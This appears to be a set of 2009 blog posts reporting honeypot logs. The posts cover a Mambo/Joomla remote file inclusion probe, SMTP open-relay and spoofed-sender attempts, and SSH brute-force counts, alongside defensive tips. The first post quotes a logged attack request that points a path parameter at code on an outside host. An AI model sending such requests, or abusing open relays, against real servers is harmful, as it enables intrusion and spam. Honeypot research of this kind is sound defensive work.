Although this file has been fixed in this application, the truth is that this scanner continues to include this as a test. The reason for this is that still have many applications with this vulnerability exposed on the Internet.

Mambo/Joomla

The CMS Mambo is very popular and used worldwide. The Joomla is a derivative of the first one. In this applications have been discovered many bugs, MFS seems to use some of them. We saw one in particular:

--MARK--,"Wed Dec 24 16:07:34 WET 2008","IIS/HTTP","74.52.10.34","192.168.1.50",55438,80,
"GET /shop/index.php?option=com_registration&task=register//boutique/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://217.20.172.129/twiki/a.gif?/ HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Morfeus Fucking Scanner
Host: 82.155.248.190
Connection: Close
",
--ENDMARK--

The attacker wants to set the variable mosConfig_absolute_path from the file index.php with the typical message that has already explained above. What we find is that the input passed to this file in not validated before being used to include files.
This system can be victim of one attack by allowing run code from any source without ever make payable checks.

Prevent attacks from MFS

One way to block this type of attacks from MFS is to add the following lines of code in file. “htaccess” in the folder of the website.

# Start of .htaccess change.
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ - [F]
# End of .htaccess change.

Outroduction

Note that the “.htaccess” solutions that I gave only works for HTTP servers that use Apache. Users of IIS can use the IsapiRewrite tool.

References





SMTP Attacks

11 01 2009

This post is part of the results discovered when the honeypot was running. This port concerns to SMTP connections to the honeypot.

SMTP

SMTP stands for Simple Mail Transfer Protocol, defined in RFC 2821, it is a standard protocol that allows transmission e-mails through IP networks.
Typically the SMTP is used on the server side to send and receive e-mail messages while on the client side is only used to send e-mails. To receive clients use the protocol POP3 or Internet Message Access Protocol (IMAP).

In the following chart I will show the activity that were on our honeypot, throw port 25, while our honeypot was on:

SMTP & Bad SMTP configuration

The e-mail client (SMTP client) connects to port 25 of the e-mail server, this is the default SMTP port, and sends an EHLO to the server indicating his identity. The server opens the session and provide a list of the extensions it supports in a machine-readable format.

S: 220 bps-pc9.local.mynet Microsoft ESMTP MAIL Service, Version: 5.0.2195.5329 ready at  Dom Jan 11 19:32:00 WET 2009
C: EHLO localhost
S: 250-bps-pc9.local.mynet Hello [1]
S: 250-TURN
S: 250-ATRN
S: 250-SIZE
S: 250-ETRN
S: 250-PIPELINING
S: 250-DSN
S: 250-ENHANCEDSTATUSCODES
S: 250-8bitmime
S: 250-BINARYMIME
S: 250-CHUNKING
S: 250-VRFY
S: 250-X-EXPS GSSAPI NTLM LOGIN
S: 250-X-EXPS=LOGIN
S: 250-AUTH GSSAPI NTLM LOGIN
S: 250-AUTH=LOGIN
S: 250-X-LINK2STATE
S: 250-XEXCH50}
S: 250 OK

The 250 code is the best message from all available and means: Requested action taken and completed. In fact this EHLO message is an extension to SMTP (ESMTP), according to RFC1869. Because so, some old servers may not support EHLO command, and in that case the client must use HELO.

Spammers can pass throw unchecked HELO commands, hitting non fully qualified domain names to identify herself.
As we have seen in the honeypot log files, many attempts from spammers to do that:

EHLO user-3i39rqqo1r
...
EHLO premier-ksxhhv6
...
EHLO mta101
...
EHLO msg-g09pmirpcam

We can reduce this attempts just requiring the identity between […], and configuring SMTP server to check that.
Another idea is to check the HELO/EHLO argument and verify if it does not resolve in DNS. There are lot more kind of validations to resolve this problem, but unfortunately seems that a lot of SMTP administrators simply ignore section 3.6 of RFC2821.
Of course we don’t implement that in our honeypot, because we want to attract all kind of people to interact with our system.

Here is some statistics from identification attempts to the SMTP server in our honeypot:

And here you can see the preferred command from attackers:

So, we can really do something to stop spreading spamm from the networks…

Continuing with explanation of SMTP: now, if we want to send an e-mail, we must start with MAIL FROM: and the the e-mail address of the sender, between brackets. In the example below I do not use brackets because of HTML, but in SMTP server you will need.

C: MAIL FROM: from@domain.com
S: 250 from@domain.com... Sender ok 

This command tells the server that a new mail is starting to be done, and the server reset all its state tables and buffers, from previous e-mails. If SMTP accept then it return the code 250. SMTP do a validation here, to verify is the person who is using the service can send mail’s using e-mail address from@domain.com.

Now the e-mail client can give the address of the recipient of the message. The command to perform this action, RCPT TO:

C: RCPT TO: to@domain.com
S: 250 to@domain.com... Recipient ok (will queue)

The server will save the mail locally, and we are ready to write the body of our e-mail.
To start writing the message we hit:

C: DATA
S: 354 Start mail input; end with CRLF.CRLF
C: From: from@domain.com
C: To: realTO@domain.com
C: Subject: BC_82.155.126.2
C: Date: Sun, 07 Dec 08 19:24:09 GMT
C: Hello, I'm a spammer!

Yes, in fact you can put a completely different e-mail and name from the one you put in RCPT TO.
When the message is finished, you hit CRLF.CRLF and you are done, the e-mail will be added to the queue, and will be sent.

The problem begins when the SMTP server don’t verify the command FROM parameter, that is what is called an Open Mail Relay.

Open Relay Scanners

The SMTP servers support a lot of configurations, just like other servers. We say that an open mail relay is an SMTP server configuration that allow anyone on the Internet to send e-mail. This e-mails could be sent to known and not known users from the system. This used to be the default configuration of SMTP servers. With the emergence of spammers these systems began to appear on blacklists of other servers.
But the truth is that until today, some SMTP servers are configured this way. Allowing spreading of spamm and worms. Then you have John Gilmore who run a Open mail relay since the 90’s, and is blacklisted in a lot of servers.

We have find a lot of hit’s from open relay scanners in our honeypot:

HELO 82.155.248.223
MAIL FROM:
RCPT TO:
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223
HELO 82.155.248.223
MAIL FROM: 
RCPT TO:
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223
HELO 82.155.248.223
MAIL FROM:
RCPT TO:
DATA
Subject: Super webscan open relay check succeded, hostname = 82.155.248.223

We found also that all the open mail relay attacks where from cities in Taiwan, this country seems to have a big activity on what concerns to spamm, like ProjectHoneyPot page shows:

118.165.91.55 - Taipei
219.86.32.1 - Hualien
124.11.193.219 - Taipei
124.11.192.173 - Taipei
114.44.42.34 - Taipei
114.44.43.87 - Taipei

I have checked, and all of them are blacklisted in international DNSBLs.
By the way, all of them use Windows XP SP1, if that matters…

With an open mail relay machine active, spammers can send a lot of spamm throw that machine to their targets, distributing the cost of sending spamm to various computers.

Future Work

For now that’s all the stuff we find in our honeypot logs related to the SMTP server.
Stay tuned, for further news.





SSH Login Attempts

11 01 2009

Back with honeypot news! We have launched our honeypot for 5 weeks, and now we have results to show you. In this post I will show you the attempts that attackers make to get into our ssh honeypot server.

The ssh honeypot was fustigated during these 5 weeks. Several attempts were made, about 78227, but no one successful.

Here is the graphic for usernames attempts:

And here is the graphic for password attempts:

Future Work

We will show all the rest of information that we capture on our honeypot in the future. We have discovered great stuff.
I have also done a nice program to generate statistics in Haskell using HaskellCharts, I will talk about that later too.

That’s all for now!